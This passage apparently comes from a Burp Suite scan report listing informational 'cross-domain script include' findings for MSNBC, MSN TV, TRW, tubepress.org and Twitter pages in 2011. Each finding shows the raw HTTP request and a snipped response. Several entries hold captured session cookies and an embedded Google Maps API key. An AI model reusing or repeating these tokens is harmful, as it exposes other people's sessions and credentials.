</div><script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2442&lib=jquery&addwidgets=zinger,wetbar"></script>
...[SNIP]...

18.242. http://today.msnbc.msn.com/id/41299602/ns/today-today_fashion_and_beauty/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/41299602/ns/today-today_fashion_and_beauty/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js
http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10502

Request

GET /id/41299602/ns/today-today_fashion_and_beauty/ HTTP/1.1
Host: today.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.243. http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://today.msnbc.msn.com
Path:	/id/41302280/ns/today-entertainment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js
http://an.tacoda.net/an/13015/slf.js
http://cache-01.cleanprint.net/cp/ccg?divId=2556
http://service.collarity.com/cust/msnbc/ucs.js
http://todayshow.us.intellitxt.com/intellitxt/front.asp?ipid=10508

Request

GET /id/41302280/ns/today-entertainment/ HTTP/1.1
Host: today.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.244. http://trw.com/who_we_are/locations previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trw.com
Path:	/who_we_are/locations

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAespMtpk4BsxBoomjX2y7MhQ1Yv4N9hisEXaN911iqTFs-95kKBQBHK_jlFctXBpByOKq5m_IQ8PFaw&sensor=false

Request

GET /who_we_are/locations HTTP/1.1
Host: trw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS6ce6c8782f0180a7bbf1be6e3bdd5794=irfb6j6tguh6qri8bi1dehb9l5; __utmz=252366028.1296674192.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252366028.856381729.1296674192.1296674192.1296674192.1; __utmc=252366028; __utmb=252366028.1.10.1296674192;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:36:56 GMT
Server: Apache/2.2.10 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 19:36:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 83504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAespMtpk4BsxBoomjX2y7MhQ1Yv4N9hisEXaN911iqTFs-95kKBQBHK_jlFctXBpByOKq5m_IQ8PFaw&sensor=false"></script>
...[SNIP]...

18.245. http://trw.mediaroom.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trw.mediaroom.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.trw.com/misc/drupal.js?i
http://www.trw.com/misc/jquery.js?i
http://www.trw.com/sites/all/modules/filefield/filefield.js?i
http://www.trw.com/sites/default/modules/poormanscron/poormanscron.js?i
http://www.trw.com/sites/default/themes/trw/scripts.js?i

Request

GET /index.php HTTP/1.1
Host: trw.mediaroom.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 06:56:33 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=96h5pb857mgr9cp1ldob99elb1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<link type="text/css" rel="stylesheet" media="print" href="http://www.trw.com/sites/default/themes/trw/print.css?i" />
<script type="text/javascript" src="http://www.trw.com/misc/jquery.js?i"></script>
<script type="text/javascript" src="http://www.trw.com/misc/drupal.js?i"></script>
<script type="text/javascript" src="http://www.trw.com/sites/all/modules/filefield/filefield.js?i"></script>
<script type="text/javascript" src="http://www.trw.com/sites/default/modules/poormanscron/poormanscron.js?i"></script>
<script type="text/javascript" src="http://www.trw.com/sites/default/themes/trw/scripts.js?i"></script>
...[SNIP]...

18.246. http://tubepress.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tubepress.org
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js

Request

GET / HTTP/1.1
Host: tubepress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fastcgi/2.4.6 Phusion_Passenger/2.2.5
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie
X-Powered-By: W3 Total Cache/0.9.1.4
X-Pingback: http://tubepress.org/xmlrpc.php
Last-Modified: Wed, 02 Feb 2011 15:42:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head profil
...[SNIP]...
</script>
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js'></script>
...[SNIP]...



       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
...[SNIP]...

18.247. http://tv.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET / HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 69804
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=61adeaebc4c947bc9a31ca64a303644c; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba28
Date: Wed, 02 Feb 2011 15:42:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
MSN TV: Ho
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.248. http://tv.msn.com/last-night-on-tv/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/last-night-on-tv/

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /last-night-on-tv/ HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 33889
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=6e26d8f6fa754507a302411667b60080; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 01 Feb 2011 15:38:01 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Last Night
...[SNIP]...
</script>
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

18.249. http://tv.msn.com/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.msn.com
Path:	/tv/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://help.live.com/resources/neutral/launchhelp.js

Request

GET /tv/article.aspx?news=625989&gt1=28103 HTTP/1.1
Host: tv.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.250. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296615671
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

18.251. http://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a2.twimg.com/a/1296609216/javascripts/fronts.js
http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 16:30:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664202-89830-33272
ETag: "920abfd907e800128503bdd06399672e"-gzip
Last-Modified: Wed, 02 Feb 2011 16:30:02 GMT
X-Runtime: 0.01606
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCPJPud4tAToVaW5fbmV3X3VzZXJfZmxvdzAi%250ACmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7%250AAAY6CkB1c2VkewA6B2lkIiUwZWU5YmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2%250AY2E4OQ%253D%253D--ef6ced9d16358caf25f8d9b08a62f50e6303ddca; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 43949

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
</h2>

<script src="http://a3.twimg.com/a/1296609216/javascripts/widgets/widget.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/fronts.js" type="text/javascript"></script>
...[SNIP]...

18.252. http://twitter.com/BWBLLC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/BWBLLC

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /BWBLLC HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:24:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296663852-68804-18462
ETag: "dc67353ac27d52a6b14c3f67f17b4ed5"
Last-Modified: Wed, 02 Feb 2011 16:24:12 GMT
X-Runtime: 0.01276
Content-Type: text/html; charset=utf-8
Content-Length: 48862
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.253. http://twitter.com/BWBLLC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/BWBLLC

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /BWBLLC HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570768-98244-59715
ETag: "ebdca5bd57211ed1c27e542912e61742"
Last-Modified: Tue, 01 Feb 2011 14:32:48 GMT
X-Runtime: 0.01599
Content-Type: text/html; charset=utf-8
Content-Length: 48897
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570765223791; path=/; expires=Tue, 08-Feb-11 14:32:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657076824620235; path=/; expires=Thu, 03 Mar 2011 14:32:48 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWRkMWJkNjNjOGU3MzQ2NWE5NTFhYjYzODhhMGE2NzNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIeNuj4S0B--c9572565bc313082d5b9e07f8d706ef935c47b43; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369" type="text/javascript"></script>
...[SNIP]...

18.254. http://twitter.com/BW_Technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/BW_Technology

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /BW_Technology HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:26:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664019-56694-22627
ETag: "f1e512350cdb8ba15406f17eea808cea"
Last-Modified: Wed, 02 Feb 2011 16:26:59 GMT
X-Runtime: 0.18947
Content-Type: text/html; charset=utf-8
Content-Length: 35114
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.255. http://twitter.com/BW_Technology previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/BW_Technology

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296528369
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /BW_Technology HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:32:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570769-95484-58827
ETag: "52999ee31da300d52a4b8d6a223f9979"
Last-Modified: Tue, 01 Feb 2011 14:32:49 GMT
X-Runtime: 0.01162
Content-Type: text/html; charset=utf-8
Content-Length: 35328
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570767091469; path=/; expires=Tue, 08-Feb-11 14:32:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657076911317049; path=/; expires=Thu, 03 Mar 2011 14:32:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTljYTdkYWIzMjIzZjYxMWJkNGYzYjJlNDQzYmNlMDc3Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI296j4S0B--42513326a672403856d8e72f3be1e034918ba41e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296528369" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296528369" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296528369" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/api.js?1296528369" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296528369" type="text/javascript"></script>
